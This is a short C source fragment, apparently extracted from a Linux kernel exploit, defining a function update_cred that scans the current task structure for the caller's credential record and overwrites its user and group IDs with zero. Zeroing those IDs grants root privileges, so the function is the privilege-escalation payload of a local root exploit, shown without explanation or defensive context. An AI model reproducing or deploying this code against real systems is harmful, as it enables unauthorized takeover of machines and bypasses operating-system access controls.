
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint32_t ;


 int* get_current () ;
 int gid ;
 int* taskstruct ;
 int uid ;

__attribute__((used)) static void update_cred()
{
 uint32_t i;
 uint32_t *task = get_current();
 uint32_t *cred = 0;

 for (i = 0; i < 1024; i++)
 {
  taskstruct[i] = task[i];
  cred = (uint32_t *)task[i];
  if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
   cred++;
          if (cred[0] == uid && cred[1] == gid
              && cred[2] == uid && cred[3] == gid
              && cred[4] == uid && cred[5] == gid
              && cred[6] == uid && cred[7] == gid)
          {

            cred[0] = cred[2] = cred[4] = cred[6] = 0;
                  cred[1] = cred[3] = cred[5] = cred[7] = 0;
    break;
          }
  }
 }
}
